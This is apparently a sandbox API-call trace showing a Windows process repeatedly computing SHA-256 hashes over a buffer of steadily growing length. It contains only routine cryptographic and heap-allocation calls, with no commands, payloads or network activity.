	[0192.622] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.622] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0192.622] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.622] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302b70
	[0192.622] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302b70, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302b70, pdwDataLen=0x1283b0) returned 1
	[0192.622] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.622] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.622] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.623] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.623] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0192.623] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.623] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302b98
	[0192.623] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302b98, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302b98, pdwDataLen=0x1283b0) returned 1
	[0192.623] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.623] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.623] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.624] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.624] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0192.624] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.624] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302bc0
	[0192.624] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302bc0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302bc0, pdwDataLen=0x1283b0) returned 1
	[0192.624] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.624] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.624] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.625] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.625] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0192.625] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.625] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302be8
	[0192.625] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302be8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302be8, pdwDataLen=0x1283b0) returned 1
	[0192.625] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.625] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.625] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.625] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.625] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0192.625] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.625] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302c10
	[0192.626] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302c10, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302c10, pdwDataLen=0x1283b0) returned 1
	[0192.626] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.626] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.626] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.626] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.626] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0192.626] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.626] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302c38
	[0192.626] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302c38, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302c38, pdwDataLen=0x1283b0) returned 1
	[0192.626] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.626] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.626] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.627] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.627] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0192.627] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.627] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302c60
	[0192.627] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302c60, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302c60, pdwDataLen=0x1283b0) returned 1
	[0192.627] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.627] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.627] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.628] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.628] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0192.628] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.628] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302c88
	[0192.628] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302c88, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302c88, pdwDataLen=0x1283b0) returned 1
	[0192.628] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.628] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.628] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.629] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.629] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0192.629] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.629] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302cb0
	[0192.629] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302cb0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302cb0, pdwDataLen=0x1283b0) returned 1
	[0192.629] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.629] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.629] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.630] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.630] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0192.630] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.630] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302cd8
	[0192.630] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302cd8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302cd8, pdwDataLen=0x1283b0) returned 1
	[0192.630] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.630] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.630] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.630] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.630] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0192.630] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.630] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302d00
	[0192.630] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302d00, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302d00, pdwDataLen=0x1283b0) returned 1
	[0192.631] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.631] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.631] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.631] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.631] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0192.631] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.631] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302d28
	[0192.631] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302d28, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302d28, pdwDataLen=0x1283b0) returned 1
	[0192.631] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.631] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.631] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.632] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.632] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0192.632] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.632] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302d50
	[0192.632] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302d50, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302d50, pdwDataLen=0x1283b0) returned 1
	[0192.632] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.632] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.632] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.633] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.633] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0192.633] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.633] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302d78
	[0192.633] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302d78, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302d78, pdwDataLen=0x1283b0) returned 1
	[0192.633] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.633] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.633] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.634] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.634] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0192.634] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.634] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302da0
	[0192.634] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302da0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302da0, pdwDataLen=0x1283b0) returned 1
	[0192.634] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.634] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.634] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.634] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.634] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0192.634] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.634] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302dc8
	[0192.634] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302dc8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302dc8, pdwDataLen=0x1283b0) returned 1
	[0192.635] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.635] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.635] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.635] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.635] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0192.635] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.635] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302df0
	[0192.635] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302df0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302df0, pdwDataLen=0x1283b0) returned 1
	[0192.635] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.635] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.635] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.636] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.636] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0192.636] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.636] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302e18
	[0192.636] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302e18, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302e18, pdwDataLen=0x1283b0) returned 1
	[0192.636] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.636] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.636] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.637] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.637] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0192.637] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.637] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302e40
	[0192.637] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302e40, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302e40, pdwDataLen=0x1283b0) returned 1
	[0192.637] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.637] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.637] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.638] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.638] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0192.638] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.638] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302e68
	[0192.638] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302e68, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302e68, pdwDataLen=0x1283b0) returned 1
	[0192.638] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.638] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.638] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.638] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.638] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0192.638] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.638] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302e90
	[0192.638] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302e90, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302e90, pdwDataLen=0x1283b0) returned 1
	[0192.638] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.639] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.639] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.639] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.639] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0192.639] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.639] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302eb8
	[0192.639] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302eb8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302eb8, pdwDataLen=0x1283b0) returned 1
	[0192.639] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.639] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.639] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.640] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.640] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0192.640] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.640] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302ee0
	[0192.640] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302ee0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302ee0, pdwDataLen=0x1283b0) returned 1
	[0192.640] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.640] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.640] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.641] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.641] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0192.641] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.641] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302f08
	[0192.641] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302f08, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302f08, pdwDataLen=0x1283b0) returned 1
	[0192.641] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.641] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.641] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.641] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.642] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0192.642] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.642] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302f30
	[0192.642] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302f30, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302f30, pdwDataLen=0x1283b0) returned 1
	[0192.642] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.642] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.642] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.642] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
